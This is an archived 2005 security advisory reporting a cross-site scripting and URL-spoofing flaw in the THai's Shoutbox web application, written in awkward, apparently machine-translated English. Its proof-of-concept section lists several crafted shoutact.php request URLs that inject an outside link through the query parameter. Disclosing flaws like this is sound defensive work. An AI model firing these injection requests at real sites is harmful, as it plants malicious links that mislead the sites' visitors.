[Full-disclosure] THai's Shoutbox XSS (Spoofing URL) BUG

2005-03-28T00:00:00
ID SECURITYVULNS:DOC:8167
Type securityvulns
Reporter Securityvulns
Modified 2005-03-28T00:00:00

Description

-=[--------------------ADVISORY-------------------]=- -=[
]=- -=[ THai's Shoutbox ]=- -=[
]=- -=[ Author: CorryL www.x0n3-h4ck.org ]=- -=[
]=- -=[----------------------------------------------------]=-

-=[+] Application: THai's Shoutbox -=[+] Version: not available -=[+] Vendor's URL: not available -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: XSS spoofing url -=[+] Exploitation: Remote/Local -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck

..::[ Descriprion ]::..

THai's Shoutbox and' a small glass showcase where the consumers of his/her own site can leave messages, and' very easy to use and to install, it doesn't need database mysql

..::[ Bug ]::..

this application and' he/she cuts from a bug type XSS a remote attaccker it is able' to exploit this bug for spoofing a malignant url

..::[ Proof Of Concept ]::..

/shoutact.php?yousay=default&query=http://www.x0n3-h4ck.org /shoutact.php?yousay=default&name=default&query=http://www.x0n3-h4ck.org /shoutact.php?yousay=default&email=default&query=http://www.x0n3-h4ck.org /shoutact.php?yousay=default&email=default&name=default&query=http://www.x0n 3-h4ck.org

..::[ Workaround ]::..

Vendor not avaliable

..::[ Disclousure Timeline ]::..

[27/03/2005] - No patch relase from vendor (not avaliable) [27/02/2005] - Public disclousure

CorryL corryl80@gmail.com www.x0n3-h4ck.org Italian Security Team Fax (+39) 02700520894 Tel (+39) 06452215277 irc.xoned.net #x0n3-h4ck


www.seekstat.it is your web stat


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/